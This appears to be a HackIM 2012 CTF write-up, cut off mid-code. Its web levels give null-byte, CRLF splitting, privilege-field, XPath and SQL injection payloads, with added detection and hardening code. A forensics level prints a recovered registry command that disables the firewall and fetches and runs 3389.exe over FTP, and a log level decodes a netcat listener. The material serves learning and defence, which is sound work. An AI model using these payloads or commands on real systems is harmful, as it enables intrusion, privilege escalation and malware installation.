So the filename might be "hello%00blah" to PHP, but it would be "hello" to the operating
system. Some applications append a file extension to the end of any filename we give them. So
we give them "hello" and they open "hello.txt". This is why we use “hello.php%00”: because
PHP sees "hello.php%00.txt" and the OS sees "hello.php".
And after this long, boring, worthless explanation, hence the flag.

Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
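An added Python example, not part of the write-up, that models the two views of the filename described above, the application's suffix check on the full string versus the NUL-terminated name the operating system opens, with a hardened check beside it.

```python
from urllib.parse import unquote

ALLOWED_SUFFIX = ".txt"


def c_string(name):
    """What a NUL-terminated C / Win32 file API sees: everything after the first NUL is gone."""
    return name.split("\x00", 1)[0]


def vulnerable_resolve(param):
    """Model of the level's check: the script looks at the whole decoded string and is happy
    with '.txt' at the end, but the file that actually gets opened is the C-truncated name.
    Returns the name the OS would open, or None if the application rejected the input."""
    name = unquote(param)
    if not name.endswith(ALLOWED_SUFFIX):
        return None                       # rejected by the application-level check
    return c_string(name)                 # ... yet this is what the OS opens


def hardened_resolve(param):
    """Reject embedded NULs and path separators first, then apply the suffix rule to a name
    that cannot be reinterpreted further down the stack."""
    name = unquote(param)
    if "\x00" in name or "/" in name or "\\" in name or name in ("", ".", ".."):
        return None
    if not name.endswith(ALLOWED_SUFFIX):
        return None
    return name


if __name__ == "__main__":
    for p in ("test.txt", "password.asp", "password.asp%00.txt"):
        print(p, "->", vulnerable_resolve(p), "| hardened:", hardened_resolve(p))
```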


Web Level 2:


Official Hint: Judgment of Solomon

Page Source: Nothing Interesting


Description: Can you redirect ME to hackim.null.co.in?

Analysis: I had to go through the hint to get this one done. After a few attempts with variations of
parameters, I had to go through the boring story on Wikipedia. The summary of the story
was: “Solomon suggested that the baby be split in half and each half given to one of the women
claiming to be the mother”. So the hint refers to the word "split". A quick search for the string
“HTTP Splitting” returned several results. I studied a few of them, showing various PoCs, and
realized that I had spent most of my time injecting the HTTP response rather than redirecting it.
Hence I finally got the level done with several parameter variations.


Flag: http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in
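An added Python example, not from the write-up, written from the server's side: it finds query parameters whose decoded value carries CR/LF, shows the header lines the level's payload would have injected, and refuses such values before they reach a response header.

```python
from urllib.parse import parse_qsl, urlsplit

# The level's flag URL, as given on the page.
FLAG_URL = ("http://www.nullcon.net/challenge/wlevel-2-proc.asp?page="
            "%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in")


def crlf_injection_params(url):
    """Return {name: decoded value} for every query parameter whose decoded value contains
    a CR or LF; %0d%0a only becomes a line break after URL decoding, so decode first."""
    found = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if "\r" in value or "\n" in value:
            found[key] = value
    return found


def injected_header_lines(value):
    """The lines a server that echoes `value` unchecked would emit into its response head."""
    return [line for line in value.replace("\r\n", "\n").split("\n") if line]


class HeaderInjection(ValueError):
    pass


def safe_header_value(value):
    """What the server should do before placing a request parameter in a header: refuse CR/LF."""
    if "\r" in value or "\n" in value:
        raise HeaderInjection("CR/LF in header value")
    return value


if __name__ == "__main__":
    for name, value in crlf_injection_params(FLAG_URL).items():
        print(name, "->", injected_header_lines(value))
```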


Web Level 3:

Official Hint: Proxies are golden friends

Page Source: <!-- If you're still reading, better register Mate :) -->

Description: Click here to Login || Click here to Register

Analysis: In this level we were entertained with two options, register and login. I clicked on both
of them and went through the page source; nothing seemed interesting. Had a thought that it
could be vulnerable to some kind of injection. In the next step I filled up the form and registered.
Wow, my registration was successful; didn’t expect that though. But on login with those credentials,
all I got was the error message “Only ADMINS are Welcome!”. Came back again to the
registration page and tried another input. There I observed the page source, and cool, there
we had something interesting this time, in this format:
<!--Debug Info: INSERT 'uname|pass|uname|uname@localhost.com|admin:no|comment:new user' INTO USER DB FILE -->
So it was all here: the parameter with admin:no was passed into the database. Now there was not
much to do; next I used Burp Suite to check how the parameters were passed.
On the last line we can observe inside the window how the parameters are passed to the server. This
format was similar to what we got earlier in the post-registration page source. So all we had to
do was add admin:yes as per the format. Even this process annoyed me a lot, since I couldn’t get it
correct on a single attempt.

So, the correct format was:
username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=Register

And finally I registered myself as the admin and got the flag.
Flag: b3149ecea4628efd23d2f86e5a723472
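An added Python example (not part of the write-up) that models the record format the debug comment exposed: user fields joined with '|' ahead of the server's own admin:no, so a delimiter in the email field smuggles in an earlier admin:yes. parse_record() assumes a first-key-wins reader, which is my assumption about the server; the hardened builder rejects delimiter characters and never derives privileges from the request.

```python
# Field order as shown by the debug comment: uname|pass|uname|uname@localhost.com|admin:no|comment:...
FIELDS = ("username", "password", "name", "email")


def build_record_naive(values):
    """The pattern the debug comment revealed: user fields joined with '|' and the server's
    own attributes appended afterwards, with nothing escaped or validated."""
    return "|".join(values[f] for f in FIELDS) + "|admin:no|comment:new user"


def parse_record(record):
    """Assumed reader (my assumption, not the level's real code): split on '|', treat
    'key:value' tokens as attributes, and let the first occurrence of a key win."""
    attrs = {}
    for token in record.split("|"):
        if ":" in token:
            key, value = token.split(":", 1)
            attrs.setdefault(key, value)
    return attrs


class BadField(ValueError):
    pass


def build_record_hardened(values):
    """Refuse delimiter and key/value characters in user-supplied fields, so no field can
    impersonate a server attribute; privileges still come only from the server side."""
    for f in FIELDS:
        if any(ch in values[f] for ch in "|:\r\n"):
            raise BadField(f)
    return "|".join(values[f] for f in FIELDS) + "|admin:no|comment:new user"


if __name__ == "__main__":
    evil = {"username": "me.admin", "password": "admin", "name": "admin",
            "email": "admin@localhost.com|admin:yes"}
    print(parse_record(build_record_naive(evil)))
```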


Web Level 4: Can You Get Me all the Data?

Official Hint: if you think you've seen all the data, i'm afraid you're mistaken

Page Source: Nothing Interesting

Description: 2007 && 2002

Analysis: At the beginning of this level I had no idea at all what really was required
for it. After hovering around the links for a few hard hours, I got a cool link on OWASP:
https://www.owasp.org/index.php/Interpreter_Injection
There were a few interesting attack vectors, which I foolishly tried in vain, with no luck. I read
the description again and understood it was asking to reveal data from the server, and then I
realized that I had tried those injection parameters blindly. On my next attempt I went
looking for cheat sheets on various attack parameters. I collected a few of them and studied them.
Those were beyond my understanding. Helplessly shouted in the IRC and got some clue, a clue
which again required traversing blindly. Eventually I came across an article,
http://palpapers.plynt.com/issues/2005Jul/xpath-injection/, which described XPath injection in
simple, understandable language, and then a good cheat sheet over here:
http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta-stone/
I tried those attack vectors and unexpectedly got the flag with this one:

input='] | /* | /foo[bar='

I completed this level blindly, a bad one.

Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear


Web Level 5:

Official Hint: It’s SQLi

Page Source: Nothing Interesting

Description: Do You Have What IT Takes to Break into the World's Most Secure Login
System?

Analysis: The very first thing anyone would try after looking at the page was the
very common SQL injection (' or 1=1--), and yes, I was on the same side of the coin. As usual I
was wrong again. Assuming it to be a blind SQLi, I looked around www.1337day.com and
www.exploit-db.com in the hope of getting some good papers. On the very first link on exploit-db I
got to see a paper on advanced blind SQLi; went through it and there were some attack vectors
against web application firewalls. With positive hope I tried, and on the second attempt, using '<>'1 as the
username and password, made it to the flag.

Flag: 47c1b025fa18ea96c33fbb6718688c0f
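An added Python example covering Web Levels 4 and 5 from the defender's side (not part of the write-up): a small signature scan over constructed access-log lines that carry the XPath payload '] | /* | /foo[bar=' and the '<>'1 SQLi tautology used above. The log lines and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real server logs): the two payloads from the write-up
# as a client would send them URL-encoded, plus one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:01:02 +0530] "GET /challenge/wlevel-4-proc.asp?input=%27%5D%20%7C%20%2F*%20%7C%20%2Ffoo%5Bbar%3D%27 HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2012:10:02:10 +0530] "POST /challenge/wlevel-5-proc.asp?username=%27%3C%3E%271&password=%27%3C%3E%271 HTTP/1.1" 200 233
10.0.0.7 - - [01/Jan/2012:10:03:30 +0530] "GET /challenge/wlevel-1-proc.asp?input=test.txt HTTP/1.1" 200 54
"""

# Request line: method, path, optional query, protocol.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+?)(?:\?(?P<query>\S*))? HTTP/')

# Signatures are matched against the *decoded* query; encoding alone must not hide them.
SIGNATURES = {
    "xpath-union":   re.compile(r"\]\s*\|\s*/\*"),           # ] | /*   union with the whole document
    "xpath-closing": re.compile(r"'\]\s*\|"),                # '] |     closes a predicate, starts a union
    "sqli-neq":      re.compile(r"'\s*(<>|!=)\s*'?\d"),      # '<>'1    tautology used on Web Level 5
    "sqli-or":       re.compile(r"'\s*or\s+1\s*=\s*1", re.I),  # ' or 1=1 the classic first try
}


def scan_log(text):
    """Return [(path, [signature names])] for every request whose decoded query matches."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m or not m.group("query"):
            continue
        decoded = unquote_plus(m.group("query"))
        matched = sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))
        if matched:
            hits.append((m.group("path"), matched))
    return hits


if __name__ == "__main__":
    for path, names in scan_log(SAMPLE_LOG):
        print(path, names)
```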


Reverse Engineering Levels


Reverse Engineering 1: Basic Test

Official Hint: N/A

Page Source: <!-- md5sum: 9d428bdcb07127ff4358f7d487445470 -->

Description: justdoit.exe

Analysis: The given binary seemed suspicious. So before executing it I decided to analyze it
and verify that it was safe to execute. I loaded the binary into a hex editor and observed it. The
headers showed that it was UPX packed. I unpacked it using “Universal Extractor” and went
through it again; no conclusion. Finally I executed it inside the VM and analyzed the behaviour.
At first I couldn’t get anything from it; executed it a few more times and saw the automation
done by the exe. Then I went to Google and searched for the string “keyboard automation”, and
the first option there showed AutoHotKey. Eventually I ended up looking for Exe2Ahk at
http://www.autohotkey.com/download/Exe2Ahk.exe
After successful decompilation, I found the flag in plain text.

Flag: We could talk all day about what AutoHotKey can do for an online poker player



Reverse Engineering 2: Ask nicely, it will give you what you want

Official Hint: Take another path.. in general look for interesting code blocks & execute them..
code can be anywhere in the PE, even in data | Resource? No Resource

Page Source: <!-- md5sum: c786287c7825784a85413695a9e319fc -->

Description: HackIM.exe

Analysis: I consider this the most insane level in the whole CTF competition. I nearly spent
two hacking days to get past it. To understand the binary, I downloaded nearly all the
tools found on Google with the string “PE”, went through various articles on reversing PE files, and,
nothing worse than that, shifted through 3 different debuggers one by one. Ultimately, after tracing the
flow of the program several times in OllyDbg, the following steps led to the flag:

   1. As the hint suggested “No Resource”, I loaded the PE into Resource Hacker to see
      what exactly its meaning was. Encountered the following error.
      So it was clear from this error that there was something wrong with the resource section.
   2. I turned to OllyDbg, loaded the PE and went to the memory window (ALT+M).
   3. At offset 0040C000 there was the .rsrc (resource) section. I changed the access to the section
      from Read to Full Access.
   4. Tried running the program but couldn’t get anything desired. Popped over to the hint again,
      and there it was asking to execute the resource section.
   5. So now it was time to place a jump instruction somewhere so as to execute the resource
      section. Came back to the CPU window (ALT+C).
   6. Just below the program entry point, at offset 00401273, there was a JMP instruction.
   7. So all I had to do was point the jump at the resource section, which was at offset
      address 0040C000.
   8. And finally, running the program, I got the flag in the message box.




Flag: AreYouHappyNow?


Reverse Engineering 3: null Mobile Android App

Official Hint: N/A

Page Source: <!-- md5sum: fd81ba87c0edc1f37250e680a49260d8 -->

Description: We’re proud to announce the null Mobile Android App Project; however the
application is currently in Beta Phase and requires lot of attention from the testers. In keeping
with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag.

Analysis: I didn’t have as hard a time with this one as before. I unpacked the apk file with
WinRAR and went through the contents. Inside the folder res>raw there were two files, code.js and
junk.php. The JavaScript inside code.js was in an unformatted state. I formatted it using
http://www.jsbeautifier.org and went through it, but couldn’t find anything interesting. Next I opened
the junk.php file in UltraEdit and, after careful observation, at line 72 I got to see a
packed JavaScript function. Finally an online tool at http://www.strictly-software.com/unpacker
helped me unpack the JavaScript function, revealing the flag inside it.


Flag: Do not let what you cannot do interfere with what you can do.



Reverse Engineering 4

Official Hint: we’ve updated the binary with hints, request all to download again to proceed

Page Source:
<!-- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 -->
<!-- <center><h3><a href="data/script">script</a></h3></center> -->
<!-- md5sum: 849f2d8c6e22604cba8fe4904803de10 -->

Description: REL4 UPDATE: WE have updated the binary with some hints inbuilt, Request all
to download new RE binary to proceed.

Analysis: My first attempt with the given file was to analyze its type. I used the file identifier
called TrID File Identifier also available online at http://mark0.net/onlinetrid.aspx. The result
showed up that it was an ELF binary. So I cross verified it on the terminal:
It showed up that the binary was stripped. Tried executing it and was entertained with the
following error.




I tried with strace and ltrace command but couldn’t learn much from those outputs.
The error indicated something about time machine, so I turned up in google and looked for
anything interesting on time machine, however couldn’t find anything to help.
The next thing I did was to change the system date to some back year. I changed it to year 2000.
Tried executing the binary again, and voila there was no error but even no flag. Tried giving
some parameter but that too didn’t help anything. Next I opened the new terminal and tried
looking into the current processes running using the command ps –aux and got a long list. It was
difficult to figure out so again tried filtering it using the command: ps –aux | grep script2 and
whoa, unexpectedly got to see the some shell script. Went through it, and there our flag was in
plaintext.

Flag: Nature has neither kernel nor shell; she is everything at once


Reverse Engineering 5: Got Dumped :(

Official Hint:

Page Source: <!-- md5sum: 043e4cc85c519723fad18dce7502371c -->

Description: lol.rar

Analysis: This challenge was about crash dump analysis. I opened it in a hex editor and went
through the first few lines and got an idea that it was a Windows crash dump. Next I installed WinDbg
with proper symbol configuration and loaded the dump into it. I was unaware of any such
analysis and went through a few links on Google. Got some good information and a few cheatsheets.
Ultimately the following steps helped me to understand the dump.
    1. First we had to recognize the file that caused the crash. The command !analyze -v showed us
       that stub.exe caused the crash.
    2. Next we had to extract stub.exe from the dump to analyze it. For this there is an SOS
       extension which is used for .NET debugging (to dump DLLs and EXEs):
    3. .load clr10sos.dll
    4. !sam folder_location
    5. Now we had stub.exe. Next I loaded stub.exe into OllyDbg. Stepped into the instructions
       and realized that the jump was passing to the crash portion of the assembly. Tried to
       bypass it by jumping to the messagebox function. I got the messagebox but there was
       no flag in it. Again went back to WinDbg and checked for the PID, since there was a
       GetProcessID function in the assembly. I got the PID as 0xA60, then I patched
       GetProcessID to return 0xA60 and finally got the flag.

Flag: TheLastSamurai




Log Analysis

Log Analysis 1: Basic

Official Hint: N/A

Page Source: <!-- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 -->

Description: report

Analysis: In this challenge the log was not too large but took a long time to understand. Every
line had a cool piece of information. On carefully observing the lines, I found
something very interesting on line number 31:

+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/

Checked into it and wow, found two files, but at the very next moment realized that the game was
still on. It said “Ask the proper question to get the proper answer”. Went to the page source and
got some closer to the flag; there was a hint given in a comment:
<!-- askmelater.asp?question=? -->

And to my surprise, with my very first guess, I got the flag. HAPPY!!!
The final URL was:

http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flag

Flag: 6bb61e3b7bce0931da574d19d1d82c88
Log Analysis 2: Mystery Password

Official Hint: N/A

Page Source: <!-- md5sum: 6eebd22df057377a436dad2d97fad8b6 -->

Description: log3.pcap

Analysis: There wasn’t much to this challenge. The log was unexpectedly small and within a few
minutes anyone could solve it. I opened the log in Wireshark. The easiest way to learn the
log was to see the TCP stream. Right-click in the packet list > Follow TCP Stream popped up
the TCP stream window. The very last line of the stream content revealed the password and with
the next few attempts I got the flag.

Flag: ..Supp@..adm1n
Log Analysis 3: Clever Intruder

Official Hint: N/A

Page Source: <!-- md5sum: 396df3308184a77890cb708f05915f29 -->

Description: access.rar

Analysis: A 25MB log with approx 1 lakh (100,000) lines. It seemed nearly impossible to analyze, so
I thought for a while and looked around Google for some good log explorer so as to make the task
easier. Got a few, but they were all useless; I wasted my time, came back to my old favorite
UltraEdit and gave a quick glance through the lines. Learnt from the logs that:
    - Logs were generated from different scanners.
    - There was variation in IP.
    - Scanning was performed on the same date within a fixed period of uninterrupted time.
    - The HTTP status code for most of the requests was 404.

Hence the last finding proved to be essential, assuming we couldn’t find anything interesting
in a “Page Not Found” error. I tried my level best to separate all those logs into different tabs in
UltraEdit. This was really a very hectic job; had I had some more knowledge it wouldn’t have been tough to
get past this hurdle easily. This level really made me realize how poor I am. After long hours of
assumed work, eventually came across the line with an encoded base64 string
“bmMgLWwgLXAgNjY2Ng==” and on decoding got “nc -l -p 6666”. On the original log, this
was on line number 37409 (UltraEdit).

Flag:
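
As an added example (not code from this write-up), here is the filtering described above done in Python rather than by hand in an editor: parse the access log, skip the 404 noise, URL-decode each request path and decode any base64-looking tokens into readable text. The log lines are constructed for the example; only the quoted base64 string comes from the page.

```python
"""Sift a web-server access log for base64-encoded strings in request URLs.

Added example for this write-up, not code from the original page. It parses
combined-format (Apache/nginx) lines, drops the 404 noise the way the text
describes, URL-decodes each request path and reports tokens that decode to
printable text. The log lines are constructed; only the base64 string quoted
in the write-up is taken from it.
"""
import base64
import binascii
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
# Candidate tokens: base64 alphabet, 8+ chars, optional '=' padding, not glued to more of the same
B64_RE = re.compile(r'(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{8,}={0,2})(?![A-Za-z0-9+/=])')


def decode_candidate(token):
    """Return decoded text if `token` is well-formed base64 for printable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    # Ordinary path components that happen to be a multiple of 4 chars long
    # decode to binary junk; requiring printable text removes almost all of them.
    return text if text.isprintable() and len(text) >= 4 else None


def find_encoded_requests(lines, ignore_status=("404",)):
    """Return [(line_no, client_ip, status, decoded_text)] for requests carrying base64."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m or m.group("status") in ignore_status:
            continue
        path = unquote(m.group("path"))            # %3D%3D -> ==, etc.
        for token in B64_RE.findall(path):
            decoded = decode_candidate(token)
            if decoded:
                hits.append((n, m.group("ip"), m.group("status"), decoded))
    return hits


# Constructed log lines (not from the challenge file); line 3 carries the
# encoded string the write-up found, here URL-encoded as a scanner might send it.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2012:10:15:01 +0530] "GET /robots.txt HTTP/1.1" 404 512 "-" "Nikto"',
    '10.0.0.5 - - [12/Jan/2012:10:15:02 +0530] "GET /challenge/logically_insane/ HTTP/1.1" 200 1831 "-" "Mozilla"',
    '10.0.0.9 - - [12/Jan/2012:10:16:40 +0530] "GET /index.php?page=bmMgLWwgLXAgNjY2Ng%3D%3D HTTP/1.1" 200 77 "-" "curl"',
    '10.0.0.9 - - [12/Jan/2012:10:16:41 +0530] "GET /old/index.php?page=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 404 312 "-" "curl"',
    '10.0.0.7 - - [12/Jan/2012:10:17:00 +0530] "GET /images/banner.png HTTP/1.1" 200 9043 "-" "Mozilla"',
]

if __name__ == "__main__":
    for line_no, ip, status, text in find_encoded_requests(SAMPLE_LOG):
        print(f"line {line_no}: {ip} status {status} decodes to {text!r}")
    # Re-run without the 404 filter to see what the status filter dropped.
    print("without 404 filter:", find_encoded_requests(SAMPLE_LOG, ignore_status=()))
```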
Log Analysis 4:

Official Hint: Exploited!!!

Page Source: <!-- md5sum: afcc45de48c327847c507c68ad7e6bf4 Expected Format: CVE-XXXX-XXXX -->

Description: CVE of the Exploit is the Flag

Analysis: This challenge was all about finding a CVE exhibited by the content in the log.
As mentioned, it was a Burp Suite log. To make the view easier, I renamed the log file to
log.xml and opened it in a web browser. Again this log had many 404 Not Found requests. After
going through the first few lines, came across the logs of TikiWiki; there were other logs of Joomla,
but I preferred to go sequentially. Since I am not good with exploit identification, I browsed to
http://nvd.nist.gov/ and searched CVEs for TikiWiki. Most of the results returned CVEs related to
XSS, but in our log I couldn’t see any such XSS thing, so went with the exceptions, and eventually
got the flag. Honestly I couldn’t understand which line in the log referred to the CVE, but I had
an answer for the question.

Flag: CVE-2005-1921



Log Analysis 5: Waat Laga Server

Official Hint:

Page Source: <!-- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 -->

Description: dump.rar

Analysis: Again 95 MB of logs. Loaded it into Wireshark and tried for a few minutes to look into it,
looked at the first few lines and last few lines, and honestly didn’t understand, as it was really difficult to
browse through each line one by one. Tried to find some alternate way and couldn’t learn much;
all I got was some bogus ads for shareware log explorers asking for $$$. Came back to the
description again and noticed that for the 3rd flag a name was required. Googled for the string “Local
Privilege Escalation Exploit” and the search resulted in some exploit-db papers. The interesting
thing I noticed was the CVE that might help me with author identification. The next challenge was to
look for the CVE in such a huge log. Used the cat command but that didn’t help, again tried a few
more of them but there was no result, and eventually ended up with the strings command to get the
CVE.
Also found the paper at http://www.exploit-db.com/exploits/9479/. Finally got my first flag for
the challenge: Tavis Ormandy Julien Tinnes. I studied the exploit and came to understand from
the title that it was a local root exploit.
Now expectations were high with the strings command and I extracted all the strings from the dump
to a plain text file. The command I used was:

strings dump.pcapng > dump.txt

By this time I had a stripped-down version of the log with the more important things.
Next I tried to look for the last flag, which was for the root password, since it was a local root
exploit. I looked for the pattern root inside dump.txt and got the hash for root.

Next I used John the Ripper to crack the hash and got my 2nd flag as: zuzana
On to the hunt for the 3rd flag, it asked to look for the vulnerable parameter. Opened dump.txt and saw
that there were many 404s, so again it was time to eliminate those and consider the successful
responses. I tried a few variations and again stripped down dump.txt to ok.txt; now we had
much less information to analyze.

Went through the file ok.txt and observed that the parameters page, title and id
were common to the entire set of GET requests. Hence with variation of parameters, I got the flag
successfully. I had to spend too much time with all those iterations and variations; indeed it was
one of the levels on which I spent much more time to analyze and get the flag.

Flag:
=====================================================================


Forensics Levels

Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno

Official Hint:

Page Source: <!-- md5sum: 1478ae7166bf5ab5d4f4a4136b819319 -->

Description: While conducting a raid on a suspect, the police found the system containing no
suspicious information in the form of a code. While comparing various files they came up with a
suspicious sound file and feel that the code is hidden inside the same. You are asked to find out
that code if hidden in the file.

Analysis: This was one of the coolest challenges in the HackIM 2012 CTF. I listened to the audio
and observed that there was distortion at certain places, and also heard that the distortion
appeared on a single channel. I had earlier used the audio editor software “GoldWave”. I opened that
audio in GoldWave and separated those distortions from the main stream; since the distortion
was on a single channel (right) the task became easier. After listening to the distortion it didn’t
give up any meaning, and I thought of applying some sound effect; on the very first attempt,
applying the reverse sound effect, I got the flag.

Flag: 12344346765


Forensics Level 2: Andar Ch0r

Official Hint: A night with MS Office

Page Source: <!-- md5sum: 74a967082a6c79757cf56cb29f70e8d9 -->

Description: The company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the
internal codes secretly outside the organization. The company sniffed the data being sent and
reconstructed it to find that a Word document was being sent. The company strongly suspects that
there is some hidden passport code in the document. You as a forensic investigator are provided
with a copy of that file and are required to find out the hidden code. The code has to be a
whole number.

Analysis: This challenge was full of twists; I enjoyed solving it. I opened the given Word
document and saw some numeric digits; they were some hex values. I converted them into ASCII
and was made a fool of. After a while I had doubts about the file and tried to confirm it using TrID:
http://mark0.net/onlinetrid.aspx. The result showed up the possibility of the file being an Excel
document. I renamed the file to flag.xls and opened it in Excel. Cool, I was on the right path, but now I
had no idea what to do. Next I opened the file in Notepad and went through the lines;
somewhere near the end I saw some plain text “Hey Good Job done…..” and just below there
was “Sheet1” and “Sheet2”, but I couldn’t remember seeing any Sheet2 in flag.xls. So got the
idea that it was hidden. It had been ages since I had worked on any Excel sheet, so I really had
forgotten how to hide Excel sheets. Googled, and got a link:
http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel-2007-2010/

So now Sheet2 was visible, but still I was far away from my flag. Again followed up the link
where it had asked to use the VB Editor (ALT+F11) to unhide the super hidden worksheet.

Saved it, and finally Sheet3 was revealed with the flag in it.

Flag: 6924289
Forensics Level 3: Not Guilty!

Official Hint:

Page Source: <!-- md5sum: 66666e32a8296f3073619c1dea43d9bf -->

Description: An employee was suspected of using some malicious files. The employee asserts
that he is not guilty because he never used any program except Microsoft Word and Excel. While
conducting the analysis nothing was found in the registry suggesting that something did run
automatically. All locations that can run programs automatically were examined and nothing
malicious was found. You as an investigator are provided with a piece of hive to carve out if
anything was deleted from the hive and provide the exact "Value", "value type" and "data"
deleted so that the employee gets justice.

Analysis: This level was all about registry recovery. I had never encountered such an incident and
to understand it went through several forensics articles on registry recovery. Initially I downloaded
a Windows binary of a tool called Yet Another Registry Utility (YARU). Played with it for some
time and realized that it wouldn’t help me get anywhere near the flag. Quit and went
through a few more manuals. Eventually came across a tool called “reglookup-recover”. It was
open source; installed it on Ubuntu and went through the instructions. After this it wasn’t much
tough to get the flag.

Came back to the description and cross-checked the values obtained with the result, ending up
solving this level.

Flag:
Value: Shell
Value Type: REG_SZ
Data: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q

Forensics Level 4: Intriguing MBR

Official Hint: Sometimes things spill over

Page Source: <!--
<form id="flevel-4" name="flevel-4" method="post" action="flevel-4-proc.asp"
onsubmit="return validate_form(this);">
-->

Description: A suspected drive was found in bad shape. The data extraction was almost
impossible and the final copy obtained carried only a few bytes. The bytes belonged to the initial
sectors, and wherever the system could not read, the space was filled with 0x00 so as to keep the
offset of the data obtained intact. The initial sector displayed messy MBR data.

As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drive
2) The start and end LBA for each partition
3) The start and end of unpartitioned space between two clusters

The drive showed to be a SATA drive with 512 bytes of LBA

Analysis: Yet another level that kept me away from doing anything else. Merely a 20KB file, but it may
require 20 hours to understand for a newbie like me. Started with Google on partition
forensics and ended up with the GUID Partition Table on Wikipedia, a long story I would probably
speak about sometime later (Evil Mind).
So the first thing that we required for this challenge was some boot record parser. I got one at
http://www.garykessler.net/software/index.html. The package contained 5 Perl scripts; extracted
it to a folder.
    1. I parsed the GUID Partition Table (GPT) header of the file image.dd using GPTparser.pl.
       Result of parsing:

    2. Coming back to Wikipedia, there was a header format for LBA1:

    3. So comparing offsets 072-079 from image.dd with the ones in the table, we can
       conclude that there are 9 partitions (2 primary copies as mentioned, and 7 between 72-79).
    4. Also it had been mentioned in the description that the LBA size was 512 bytes. And in
       our image.dd we can observe from the result of parsing that the partition table is starting
       from offset 80. Hence the next LBA will be at (512+80)=592.
    5. Now it was time for some hex editing. I opened image.dd and traversed to position
       592 (250h). Since we had concluded in our earlier steps that there were 9 partitions, we
       had to edit the location from 00 to 09.

    6. Now again we had to parse the modified image.dd.
    7. As in Step 1, and we got all our 9 partitions.

    8. Now the next step was to observe the GUIDs from the result and match them with the table
       given on Wikipedia to find out the partition type.
    9. Finally, the LBAs thus obtained were not arranged accordingly and we had to arrange them in
       ascending order so as to obtain the flag.

Flag:
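
An added example, not the page’s code or the Perl parser it links to: a Python GPT reader that labels the header fields by their actual offsets (partition-array LBA at 72, entry count at 80), verifies the header CRC32 as a damage indicator, and answers the three questions in the description for a constructed image. Like the challenge file, the image has a header whose entry-count field is zero, and the reader falls back to scanning the partition array in that case instead of patching the byte by hand.

```python
"""Parse a GPT header and its partition array from a damaged disk image.

Added example for this write-up, not code from the original page or the Perl
scripts it links to. For a constructed image it answers the three questions in
the description (partition count, start/end LBA of each partition, gaps between
them), assumes 512-byte LBAs as stated, and, because the challenge header had a
zeroed entry count, falls back to scanning the partition array up to the first
usable LBA whenever the header's count field reads 0.
"""
import struct
import uuid
import zlib

LBA = 512
# GPT header, first 92 bytes of LBA 1: signature, revision, header size, header CRC32,
# reserved, current LBA, backup LBA, first/last usable LBA, disk GUID,
# partition array LBA (offset 72), entry count (offset 80), entry size, array CRC32
HDR = struct.Struct("<8sIIIIQQQQ16sQIII")
# Partition entry: type GUID, unique GUID, first LBA, last LBA, attributes, UTF-16LE name
ENTRY = struct.Struct("<16s16sQQQ72s")


def parse_header(img):
    """Return the header fields at LBA 1 as a dict, plus whether its CRC32 verifies."""
    f = HDR.unpack_from(img, LBA)
    if f[0] != b"EFI PART":
        raise ValueError("no GPT signature at LBA 1")
    hdr = dict(header_size=f[2], header_crc=f[3], current_lba=f[5], backup_lba=f[6],
               first_usable=f[7], last_usable=f[8], disk_guid=str(uuid.UUID(bytes_le=f[9])),
               entries_lba=f[10], num_entries=f[11], entry_size=f[12] or 128)
    # The header CRC covers header_size bytes with the CRC field itself zeroed.
    raw = bytearray(img[LBA:LBA + hdr["header_size"]])
    raw[16:20] = b"\0\0\0\0"
    hdr["crc_ok"] = zlib.crc32(bytes(raw)) == hdr["header_crc"]
    return hdr


def parse_entries(img, hdr):
    """Return [(name, type_guid, first_lba, last_lba)] sorted by first LBA."""
    base, size = hdr["entries_lba"] * LBA, hdr["entry_size"]
    count = hdr["num_entries"]
    if count == 0:
        # Damaged count field: the array runs from entries_lba up to first_usable.
        count = (hdr["first_usable"] - hdr["entries_lba"]) * LBA // size
    parts = []
    for i in range(count):
        off = base + i * size
        if off + ENTRY.size > len(img):
            break                                   # truncated image
        type_guid, _uniq, first, last, _attrs, name = ENTRY.unpack_from(img, off)
        if type_guid == b"\0" * 16:
            continue                                # unused slot
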